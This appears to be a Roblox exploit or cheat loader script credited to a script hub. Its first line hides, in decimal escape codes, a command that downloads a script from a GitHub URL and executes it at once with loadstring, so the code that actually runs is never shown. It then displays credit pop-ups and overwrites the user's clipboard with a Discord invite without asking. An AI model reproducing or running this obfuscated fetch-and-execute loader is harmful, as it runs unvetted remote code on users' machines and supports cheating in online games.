loadstring("\32\32\32\32\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\49\101\111\115\67\111\109\112\97\110\121\47\76\101\111\115\72\117\98\47\109\97\105\110\47\83\99\114\105\112\116\71\85\73\34\41\41\40\41\32\10")()


game.StarterGui:SetCore(
    "SendNotification",
    {
        Title = "Script Provider",
        Text = "! Leos Comapany !#6462 "
         
    }
)

game.StarterGui:SetCore(
    "SendNotification",
    {
        Title = "UI Creater",
        Text = "!Mag Developments#2173 "
         
    }
)


game.StarterGui:SetCore(
    "SendNotification",
    {
        Title = "Discord",
        Text = "Copied!"
         
    }
)

setclipboard("https://discord.gg/gbCKX4PzRk")
